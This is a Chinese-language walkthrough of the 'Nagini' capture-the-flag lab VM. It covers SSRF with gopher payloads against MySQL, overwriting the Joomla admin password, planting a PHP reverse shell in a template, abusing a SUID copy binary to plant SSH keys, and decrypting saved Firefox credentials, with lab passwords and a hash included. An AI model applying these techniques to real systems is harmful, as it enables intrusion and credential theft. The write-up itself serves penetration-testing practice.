目录
依旧是80和22端口
主页面是一张图片,ctrl+u查看源码是啥都没有
得到是joomla这个cms登录界面
和joomla的后台登录界面
但是这些信息不足以帮助我们突破边界,换字典扫描看结果
爆破出来一个note.txt
出现一个提示信息,要用http3来访问这个域名。
sudo vim /etc/hosts
发现与我们之前ip访问一样
1.下载quiche
git clone --recursive https://www.github.com/cloudflare/quiche
2.安装cargo组件
sudo apt install cargo
3.cmake组件
sudo apt install cmake
4.安装例子
有报错,执行下一步
cd ./quiche
cargo build --examples
5.卸载rustc
apt purge rustc
6.重新安装
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
7.设置环境变量
source $HOME/.cargo/env
8.重新下载
cargo build --examples
9.对安装内容检查
cargo test
爆出一堆ok检查无误
10.利用http3去访问url
有个目录,提到了备份文件,尝试去访问
1.通过第一条信息,我们访问了这个目录,有一个内部网络资源获取界面,存在ssrf漏洞。
2.存在配置备份文件
访问配置文件存在目录,可以下载到备份文件
3.备份文件
收集到登录数据库的用户名密码库名等
探测到了passwd文件,里面有几个有用的信息,可以通过/bin/bash登录的用户,和mysql这个账户。证明有mysql数据库,通过ssrf漏洞配合gopher伪协议可以攻击内网应用。
利用ssrf配合伪协议,也可以读取备份文件
(1)下载工具
git clone https://www.github.com/tarunkant/Gopherus.git
(2)使用
一定在ssrf界面多提交两次,有时候不会返回结果
直接生成了一个payload,去查看表
再生成一个payload去查看字段
经过分析可以得到账号和密码
site_admin@nagini.hogwarts
<$2y$10$cmQ.akn2au104AhR4.YJBOC5W13gyV21D/bkoTmbWWqFWjzEW7vay
密码复杂 无法破解
(4)改写site_admin密码
echo "123" | md5sum
e7df7cd2ca07f4f1ab415d457a6e1c13
(5)写入数据库
use joomla;update joomla_users set password="e7df7cd2ca07f4f1ab415d457a6e1c13" where username="site_admin";
(6)登录后台
site_admin/123
(7)写入反弹shell文件
利用kali自带的php反弹shell
反弹shell文件路径:/usr/share/webshells/php
模板路径:/joomla/templates/protostar/error.php
写入模板中
(8)访问后成功反弹shell
通过上面的shell我们可以从creds.txt中得到一个bash64密码
解密:
echo " " | base64 -d
哈利波特中snape教授喜欢lilly,所以猜测这就是snape的密码
Love@lilly
1.flag1.txt
SlythEriN's LocKEet dEstroYeD bY RoN
这里有一个su_cp,有suid权限,功能就是拷贝。
ssh-keygen
scp id_rsa.pub snape@192.168.0.100~/
mv id_rsa.pub authorized_keys
chmod 640 authorized_keys
./su_cp -p ~/id_rsa.pub ../.ssh
拿到第二个flag.txt,解密一下
Helga Hufflepuff's Cup destroyed by Hermione
1.发现
在家目录下,发现了一个隐藏文件夹 .mozilla(浏览器),里面有个firefox(火狐),firefox一般来说只能在客户端上,但是这里出现在了服务端上。可以用作提权/
2.下载读取火狐信息的工具
git clone https://github.com/unode/firefox_decrypt.git
3.firefox拷贝到本地
scp -r hermoine@192.168.0.100:~/.mozilla/firefox ./
4.firefox_decrypt
5.直接ssh登录
解密后:
Diadem of Ravenclaw destroyed by Harryroot@Nagini